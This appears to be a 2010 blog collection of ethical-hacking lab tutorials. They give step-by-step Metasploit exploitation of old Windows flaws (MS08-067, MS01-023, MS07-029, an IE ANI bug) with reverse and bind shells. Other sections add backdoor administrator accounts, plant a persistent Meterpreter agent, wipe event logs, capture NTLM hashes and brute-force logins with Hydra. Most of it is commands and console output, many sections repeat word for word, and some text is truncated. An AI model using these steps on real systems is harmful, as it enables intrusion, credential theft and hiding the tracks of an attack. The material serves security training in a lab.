msf > info windows/iis/ms01_023_printer
Select and use the exploit module
msf > use windows/iis/ms01_023_printer
Display all available payloads
msf > show payloads
Select and use a specific payload
msf > set PAYLOAD windows/shell/bind_tcp
Set the Remote Host (RHOST)
msf > set RHOST 131.107.1.101
Set the Listening port (LPORT)
msf > set LPORT 8888
Launch the exploit module
msf > exploit
[*] Started bind handler
[*] Sending stage (240 bytes) to 131.107.1.101
[*] Command shell session 1 opened (131.107.1.252:57346 -> 131.107.1.101:8888) at Tue Sep 28 12:17:55 +0800 2010
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
Test privilege level by writing a file
C:\WINNT\system32>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Create a user account and add it as a member of Local Administrators group
C:\WINNT\system32>net user hacker password123 /add
net user hacker password123 /add
The command completed successfully.
C:\WINNT\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
cd /pentest/exploits/framework3
Launch MSF Console (Command Line Interface)
./msfconsole
Interact with MSF Console
Display help
msf > help
Search for a specific pattern
msf > search iis
Display information about the exploit module
msf > info windows/iis/ms01_023_printer
Select and use the exploit module
msf > use windows/iis/ms01_023_printer
Display all available payloads
msf > show payloads
Select and use a specific payload
msf > set PAYLOAD windows/shell/bind_tcp
Set the Remote Host (RHOST)
msf > set RHOST 131.107.1.101
Set the Listening port (LPORT)
msf > set LPORT 8888
Launch the exploit module
msf > exploit
[*] Started bind handler
[*] Sending stage (240 bytes) to 131.107.1.101
[*] Command shell session 1 opened (131.107.1.252:57346 -> 131.107.1.101:8888) at Tue Sep 28 12:17:55 +0800 2010
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
Test privilege level by writing a file
C:\WINNT\system32>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Create a user account and add it as a member of Local Administrators group
C:\WINNT\system32>net user hacker password123 /add
net user hacker password123 /add
The command completed successfully.
C:\WINNT\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
CEH - Port Scans Exercise
Tester : TEST-BT4 (RAM = 512MB)
Targets: DEN-WEB1 (RAM = 128MB), DEN-WEB2 (RAM = 128MB), DEN-WEB3 (RAM = 128MB), DEN-SVR1 (RAM = 256MB)
Step 1:
Start all virtual machines.
Step 2:
Logon to TEST-BT4. Login with username: root and Password: toor
Step 3:
Check your virtual machine settings.
All network interfaces should be configured with Host-only.
Configure network interface cards, type these commands:
ifconfig eth0 up
ifconfig eth0 131.107.1.252/24
ifconfig eth1 up
ifconfig eth1 192.168.1.252/24
ifconfig
startx
Step 4: Open a bash console and start scanning with Nmap. Scans all active hosts.
Host Discovery
nmap -sP 131.107.1.0/24 192.168.1.0/24
Port Scans
nmap 131.107.1.0/24
nmap 131.107.1.101
nmap -sS -sV -O 131.107.1.101
nmap -A 131.107.1.101
nmap -sU -sV 131.107.1.101
nmap -sS -p80,443 131.107.1.101
Targets: DEN-WEB1 (RAM = 128MB), DEN-WEB2 (RAM = 128MB), DEN-WEB3 (RAM = 128MB), DEN-SVR1 (RAM = 256MB)
Step 1:
Start all virtual machines.
Step 2:
Logon to TEST-BT4. Login with username: root and Password: toor
Step 3:
Check your virtual machine settings.
All network interfaces should be configured with Host-only.
Configure network interface cards, type these commands:
ifconfig eth0 up
ifconfig eth0 131.107.1.252/24
ifconfig eth1 up
ifconfig eth1 192.168.1.252/24
ifconfig
startx
Step 4: Open a bash console and start scanning with Nmap. Scans all active hosts.
Host Discovery
nmap -sP 131.107.1.0/24 192.168.1.0/24
Port Scans
nmap 131.107.1.0/24
nmap 131.107.1.101
nmap -sS -sV -O 131.107.1.101
nmap -A 131.107.1.101
nmap -sU -sV 131.107.1.101
nmap -sS -p80,443 131.107.1.101
Using Google as Currency Calculator
Did you know that you can use Google as Currency Calculator???
Visit http://www.google.com
Type: 1 USD to IDR (in the Seach field).
Result:1 U.S. dollar = 8 928.57143 Indonesian rupiahs
Visit http://www.google.com
Type: 1 USD to IDR (in the Seach field).
Result:1 U.S. dollar = 8 928.57143 Indonesian rupiahs
Google Hacking & Web Applications Vulnerabilities
Check http://www.exploit-db.com then browse to Web Applications.
You can find some information on how to find the web applications vulnerabilities by using Google Dork.
Example:
http://www.exploit-db.com/exploits/15100/
You can find some information on how to find the web applications vulnerabilities by using Google Dork.
Example:
http://www.exploit-db.com/exploits/15100/
Dork: inurl:"option=com_elite_experts"
Wednesday, September 15, 2010
Tutorial: Exploiting Internet Explorer
Local Host: 131.107.1.252/24 (TEST-BT4)
Target Host: 131.107.1.50/24 (LON-CL1)
Step 1: Create a resource file to be used by Metasploit in /tmp directory
root@bt:~# nano /tmp/exploit
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 131.107.1.252
set LHOST 131.107.1.252
set LPORT 443
set URIPATH /you_win.html
exploit
Press Ctrl-X to exit and save the file.
Step 2: Launch the exploit based on the resource file you have created earlier
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /tmp/exploit
[*] Exploit running as background job.
[*] Started reverse handler on 131.107.1.252:443
[*] Using URL: http://131.107.1.252:80/you_win.html
[*] Server started.
Step 3: Launch Internet Explorer on the remote machine and connect to http://131.107.1.252/you_win.html
Step 4: On our machine, check if you've got the connection from the target machine
msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 131.107.1.50:1163...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 131.107.1.50:1163...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:443 -> 131.107.1.50:1164) at Wed Sep 15 17:08:18 +0800 2010
Display all active sessions
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\Administrator @ LON-CL1 131.107.1.252:443 -> 131.107.1.50:1164
Interact with an active session
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Target Host: 131.107.1.50/24 (LON-CL1)
Step 1: Create a resource file to be used by Metasploit in /tmp directory
root@bt:~# nano /tmp/exploit
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 131.107.1.252
set LHOST 131.107.1.252
set LPORT 443
set URIPATH /you_win.html
exploit
Press Ctrl-X to exit and save the file.
Step 2: Launch the exploit based on the resource file you have created earlier
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /tmp/exploit
[*] Exploit running as background job.
[*] Started reverse handler on 131.107.1.252:443
[*] Using URL: http://131.107.1.252:80/you_win.html
[*] Server started.
Step 3: Launch Internet Explorer on the remote machine and connect to http://131.107.1.252/you_win.html
Step 4: On our machine, check if you've got the connection from the target machine
msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 131.107.1.50:1163...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 131.107.1.50:1163...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:443 -> 131.107.1.50:1164) at Wed Sep 15 17:08:18 +0800 2010
Display all active sessions
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\Administrator @ LON-CL1 131.107.1.252:443 -> 131.107.1.50:1164
Interact with an active session
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Tutorial: Interacting with Meterpreter
Enabling Remote Desktop
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
sniff..
Open a command shell
meterpreter > shell
Process 1616 created.
Channel 23 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>
Create a local user account and add it as a member of local administrators group
C:\Documents and Settings\Administrator>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.
C:\Documents and Settings\Administrator>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\Documents and Settings\Administrator>^C
Terminate channel 2? [y/N] y
Open another command shell then launch Remote Desktop client to connect to the target machine.
root@bt:~# rdesktop 131.107.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16
Upload file
meterpreter > upload /tmp/hacked.txt "C:\\Documents and Settings\\Administrator\\Desktop\\hacked.txt"
[*] uploading : /tmp/hacked.txt -> C:\Documents and Settings\Administrator\Desktop\hacked.txt
[*] uploaded : /tmp/hacked.txt -> C:\Documents and Settings\Administrator\Desktop\hacked.txt
Download file
meterpreter > download C:\\WINDOWS\\System32\\calc.exe /tmp
[*] downloading: C:\WINDOWS\System32\calc.exe -> /tmp
[*] downloaded : C:\WINDOWS\System32\calc.exe -> /tmp/calc.exe
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
sniff..
Open a command shell
meterpreter > shell
Process 1616 created.
Channel 23 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>
Create a local user account and add it as a member of local administrators group
C:\Documents and Settings\Administrator>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.
C:\Documents and Settings\Administrator>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\Documents and Settings\Administrator>^C
Terminate channel 2? [y/N] y
Open another command shell then launch Remote Desktop client to connect to the target machine.
root@bt:~# rdesktop 131.107.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16
Upload file
meterpreter > upload /tmp/hacked.txt "C:\\Documents and Settings\\Administrator\\Desktop\\hacked.txt"
[*] uploading : /tmp/hacked.txt -> C:\Documents and Settings\Administrator\Desktop\hacked.txt
[*] uploaded : /tmp/hacked.txt -> C:\Documents and Settings\Administrator\Desktop\hacked.txt
Download file
meterpreter > download C:\\WINDOWS\\System32\\calc.exe /tmp
[*] downloading: C:\WINDOWS\System32\calc.exe -> /tmp
[*] downloaded : C:\WINDOWS\System32\calc.exe -> /tmp/calc.exe
Tutorial: Maintaining Access & Clearing Tracks
Local Host: 131.107.1.252/24 (TEST-BT4)
Target Host: 131.107.1.50/24 (LON-CL1)
Step 1: Detect the OS version on the target machine
msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 131.107.1.50
msf auxiliary(smb_version) > run
[*] 131.107.1.50 is running Windows XP Service Pack 2 (language: English) (name:LON-CL1) (domain:FABRIKAM)
Step 2: Exploit the target machine based on known vulnerability (MS08-067)
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 131.107.1.50
msf exploit(ms08_067_netapi) > set LHOST 131.107.1.252
msf exploit(ms08_067_netapi) > set TARGET 3
msf exploit(ms08_067_netapi) > set LPORT 8888
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 131.107.1.252:8888
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:8888 -> 131.107.1.50:1125)
Step 3: Plant or inject the Meterpreter agent on the target machine
meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -A -X -p 10000 -r 131.107.1.252
[*] Creating a persistent agent: LHOST=131.107.1.252 LPORT=10000 (interval=5 onboot=true)
sniff..
msf exploit(ms08_067_netapi) > exit -y
Step 4: Create a Meterpreter listener on our machine
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 131.107.1.252
msf exploit(handler) > set LPORT 10000
msf exploit(handler) > exploit
[*] Started reverse handler on 131.107.1.252:10000
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:10000 -> 131.107.1.50:1124)
Note: Meterpreter agent will be installed in C:\WINDOWS\TEMP directory as a .vbs file and create autostart in the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(random) on the target machine.
Now you can proceed with the last step which is Clearing Tracks (Housekeeping) as follows:
meterpreter > clearev
[*] Wiping 997 records from Application...
[*] Wiping 2045 records from System...
[*] Wiping 1 records from Security...
Target Host: 131.107.1.50/24 (LON-CL1)
Step 1: Detect the OS version on the target machine
msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 131.107.1.50
msf auxiliary(smb_version) > run
[*] 131.107.1.50 is running Windows XP Service Pack 2 (language: English) (name:LON-CL1) (domain:FABRIKAM)
Step 2: Exploit the target machine based on known vulnerability (MS08-067)
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 131.107.1.50
msf exploit(ms08_067_netapi) > set LHOST 131.107.1.252
msf exploit(ms08_067_netapi) > set TARGET 3
msf exploit(ms08_067_netapi) > set LPORT 8888
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 131.107.1.252:8888
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:8888 -> 131.107.1.50:1125)
Step 3: Plant or inject the Meterpreter agent on the target machine
meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i
-p
-r
meterpreter > run persistence -A -X -p 10000 -r 131.107.1.252
[*] Creating a persistent agent: LHOST=131.107.1.252 LPORT=10000 (interval=5 onboot=true)
sniff..
msf exploit(ms08_067_netapi) > exit -y
Step 4: Create a Meterpreter listener on our machine
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 131.107.1.252
msf exploit(handler) > set LPORT 10000
msf exploit(handler) > exploit
[*] Started reverse handler on 131.107.1.252:10000
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:10000 -> 131.107.1.50:1124)
Now
meterpreter > clearev
[*] Wiping 997 records from Application...
[*] Wiping 2045 records from System...
[*] Wiping 1 records from Security...
Tuesday, September 14, 2010
Tutorial: Local Enumeration via SMB Service
Local Host: 131.107.1.222/24 (TEST-XP2)
Target Host: 131.107.1.101/24 (DEN-WEB1)
Enumerate Local Domains
Z:\Tools\Nmap>nmap --script=smb-enum-domains 131.107.1.101
Enumerate Shared Folders
Z:\Tools\Nmap>nmap --script=smb-enum-shares 131.107.1.101
Enumerate User Accounts
Z:\Tools\Nmap>nmap --script=smb-enum-users 131.107.1.101
Enumerate User Groups
Z:\Tools\Nmap>nmap --script=smb-enum-groups 131.107.1.101
Enumerate Processes
Z:\Tools\Nmap>nmap --script=smb-enum-processes 131.107.1.101
Enumerate Sessions
Z:\Tools\Nmap>nmap --script=smb-enum-sessions 131.107.1.101
Note:
On Windows, Nmap scripts directory is in Z:\Tools\Nmap\scripts
On Linux (BackTrack), Nmap script directory us in /usr/share/nmap/scripts/
All Nmap scripts have the file extension of .nse (Nmap Scripting Engine) and are written in Lua.
Target Host: 131.107.1.101/24 (DEN-WEB1)
Enumerate Local Domains
Z:\Tools\Nmap>nmap --script=smb-enum-domains 131.107.1.101
Enumerate Shared Folders
Z:\Tools\Nmap>nmap --script=smb-enum-shares 131.107.1.101
Enumerate User Accounts
Z:\Tools\Nmap>nmap --script=smb-enum-users 131.107.1.101
Enumerate User Groups
Z:\Tools\Nmap>nmap --script=smb-enum-groups 131.107.1.101
Enumerate Processes
Z:\Tools\Nmap>nmap --script=smb-enum-processes 131.107.1.101
Enumerate Sessions
Z:\Tools\Nmap>nmap --script=smb-enum-sessions 131.107.1.101
Note:
On Windows, Nmap scripts directory is in Z:\Tools\Nmap\scripts
On Linux (BackTrack), Nmap script directory us in /usr/share/nmap/scripts/
All Nmap scripts have the file extension of .nse (Nmap Scripting Engine) and are written in Lua.
Tutorial: Password Cracking Attacks
Local Host: 131.107.1.222/24 (TEST-XP2)
Target Host: 131.107.1.101/24 (DEN-WEB1)
Brute Force Password Attack via SMB service
Z:\Tools\Nmap>nmap --script=smb-brute 131.107.1.101
Dictionary Password Attack via FTP, SMB and MSSQL service
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 ftp
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 smb
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 mssql
login.txt = contains user names
pass.txt = contains passwords
Contents of login.txt file:
admin
administrator
myadmin
sa
sysadmin
root
Contents of pass.txt file:
[blank]
admin
administrator
password
password123
P@ssw0rd
P@ssw0rd123
Pa$$w0rd
Pa$$w0rd123
sa
sysadmin
root
r00t
toor
t00r
Target Host: 131.107.1.101/24 (DEN-WEB1)
Brute Force Password Attack via SMB service
Z:\Tools\Nmap>nmap --script=smb-brute 131.107.1.101
Dictionary Password Attack via FTP, SMB and MSSQL service
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 ftp
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 smb
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 mssql
login.txt = contains user names
pass.txt = contains passwords
Contents of login.txt file:
admin
administrator
myadmin
sa
sysadmin
root
Contents of pass.txt file:
[blank]
admin
administrator
password
password123
P@ssw0rd
P@ssw0rd123
Pa$$w0rd
Pa$$w0rd123
sa
sysadmin
root
r00t
toor
t00r
Tutorial: NTLM Authentication Hijack
Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Search for smb pattern
msf > search smb
Step 2: Use SMB Auxiliary module to capture hashes
msf > use server/capture/smb
msf auxiliary(smb) > show options
sniff..
msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt
msf auxiliary(smb) > set SRVHOST 192.168.1.252
msf auxiliary(smb) > run
Step 3: From the target machine, connect to our machine by using:
\\192.168.1.252\shared\xxx.jpg
Note: \shared\xxx.jpg is just a fake link (doesn't exist).
Step 4: Switch to our machine and check if you've got the hashes captured
msf auxiliary(smb) >
[*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Press Ctrl-C to exit from msf console.
To display our captured hashes, change to /tmp directory:
root@bt:/pentest/exploits/framework3# cd /tmp
root@bt:/tmp# cat captured_hashes.txt
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Search for smb pattern
msf > search smb
Step 2: Use SMB Auxiliary module to capture hashes
msf > use server/capture/smb
msf auxiliary(smb) > show options
sniff..
msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt
msf auxiliary(smb) > set SRVHOST 192.168.1.252
msf auxiliary(smb) > run
Step 3: From the target machine, connect to our machine by using:
\\192.168.1.252\shared\xxx.jpg
Note: \shared\xxx.jpg is just a fake link (doesn't exist).
Step 4: Switch to our machine and check if you've got the hashes captured
msf auxiliary(smb) >
[*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Press Ctrl-C to exit from msf console.
To display our captured hashes, change to /tmp directory:
root@bt:/pentest/exploits/framework3# cd /tmp
root@bt:/tmp# cat captured_hashes.txt
Tutorial: Metasploit Basics 3
Exploiting Vulnerable Server (MS08-067)
Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.250/24 (DEN-WEB3)
Step 1: Switch to Metasploit Framework working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole
Step 2: Determine the target's OS version
msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 131.107.1.250
msf auxiliary(smb_version) > run
[*] 131.107.1.250 is running Windows 2003 Service Pack 2
sniff...
Step 3: Search for smb pattern & use the correct exploit module (ms08-067)
msf > search smb
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 131.107.1.250
msf exploit(ms08_067_netapi) > set LHOST 131.107.1.252
msf exploit(ms08_067_netapi) > set LPORT 443
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP1 Japanese (NO NX)
9 Windows 2003 SP2 English (NO NX)
10 Windows 2003 SP2 English (NX)
11 Windows 2003 SP2 German (NO NX)
12 Windows 2003 SP2 German (NX)
13 Windows XP SP2 Arabic (NX)
sniff...
msf exploit(ms08_067_netapi) > set TARGET 10
msf exploit(ms08_067_netapi) > exploit
sniff...
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.250/24 (DEN-WEB3)
Step 1: Switch to Metasploit Framework working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole
Step 2: Determine the target's OS version
msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 131.107.1.250
msf auxiliary(smb_version) > run
[*] 131.107.1.250 is running Windows 2003 Service Pack 2
sniff...
Step 3: Search for smb pattern & use the correct exploit module (ms08-067)
msf > search smb
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 131.107.1.250
msf exploit(ms08_067_netapi) > set LHOST 131.107.1.252
msf exploit(ms08_067_netapi) > set LPORT 443
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP1 Japanese (NO NX)
9 Windows 2003 SP2 English (NO NX)
10 Windows 2003 SP2 English (NX)
11 Windows 2003 SP2 German (NO NX)
12 Windows 2003 SP2 German (NX)
13 Windows XP SP2 Arabic (NX)
sniff...
msf exploit(ms08_067_netapi) > set TARGET 10
msf exploit(ms08_067_netapi) > exploit
sniff...
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Tutorial: Metasploit Basics 2
Exploiting Vulnerable Server (MS07-029)
Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.250/24 (DEN-WEB3)
Step 1: Switch to Metasploit Framework working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole
Step 2: Search for rpc pattern & use the correct exploit module (ms07-029)
msf > search rpc
[*] Searching loaded modules for pattern 'rpc'...
msf > info windows/dcerpc/ms07_029_msdns_zonename
msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
msf exploit(ms07_029_msdns_zonename) > exploit
sniff...
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.250/24 (DEN-WEB3)
Step 1: Switch to Metasploit Framework working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole
Step 2: Search for rpc pattern & use the correct exploit module (ms07-029)
msf > search rpc
[*] Searching loaded modules for pattern 'rpc'...
msf > info windows/dcerpc/ms07_029_msdns_zonename
msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
msf exploit(ms07_029_msdns_zonename) > exploit
sniff...
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Tutorial: BackTrack Basics
Setting-up IP addresses
Option 1: Static IP addresses
Note: Ensure that all your Network Interface card (VM) was set to Host-only.
root@bt:~# ifconfig eth0 up
root@bt:~# ifconfig eth0 131.107.1.252/24
root@bt:~# ifconfig eth1 up
root@bt:~# ifconfig eth1 192.168.1.252/24
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:5d:6a:2f
inet addr:131.107.1.252 Bcast:131.107.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe5d:6a2f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:64717 errors:0 dropped:0 overruns:0 frame:0
TX packets:301639 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9873166 (9.8 MB) TX bytes:15566403 (15.5 MB)
Interrupt:19 Base address:0x2000
eth1 Link encap:Ethernet HWaddr 00:0c:29:5d:6a:39
inet addr:192.168.1.252 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe5d:6a39/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:248732 errors:0 dropped:0 overruns:0 frame:0
TX packets:6227 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15234469 (15.2 MB) TX bytes:332024 (332.0 KB)
Interrupt:16 Base address:0x2080
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:29254 errors:0 dropped:0 overruns:0 frame:0
TX packets:29254 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:7105201 (7.1 MB) TX bytes:7105201 (7.1 MB)
Option 2: Static & Dynamic IP addresses
Note: Ensure that your 2nd Network Interface card (VM) was set to NAT or Bridge.
root@bt:~# ifconfig eth0 up
root@bt:~# ifconfig eth0 131.107.1.252/24
root@bt:~# ifconfig eth1 up
NAT configuration
root@bt:~# dhclient eth1
sniff...
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/eth1/00:0c:29:5d:6a:39
Sending on LPF/eth1/00:0c:29:5d:6a:39
Sending on Socket/fallback
DHCPREQUEST of 192.168.252.63 on eth1 to 255.255.255.255 port 67
DHCPNAK from 192.168.162.254
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.162.128 from 192.168.162.254
DHCPREQUEST of 192.168.162.128 on eth1 to 255.255.255.255 port 67
DHCPACK of 192.168.162.128 from 192.168.162.254
bound to 192.168.162.128 -- renewal in 712 seconds.
Bridge configuration with Gateway and Name Servers
root@bt:~# dhclient eth1
sniff..
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/eth1/00:0c:29:5d:6a:39
Sending on LPF/eth1/00:0c:29:5d:6a:39
Sending on Socket/fallback
DHCPREQUEST of 192.168.162.128 on eth1 to 255.255.255.255 port 67
DHCPNAK from 192.168.252.37
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.252.154 from 192.168.252.37
DHCPREQUEST of 192.168.252.154 on eth1 to 255.255.255.255 port 67
DHCPACK of 192.168.252.154 from 192.168.252.37
bound to 192.168.252.154 -- renewal in 320827 seconds.
root@bt:~# route add default gw 192.168.252.1
root@bt:~# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default etserver.execut 255.255.255.0 UG 0 0 0 eth1
192.168.101.0 * 255.255.255.0 U 0 0 0 eth0
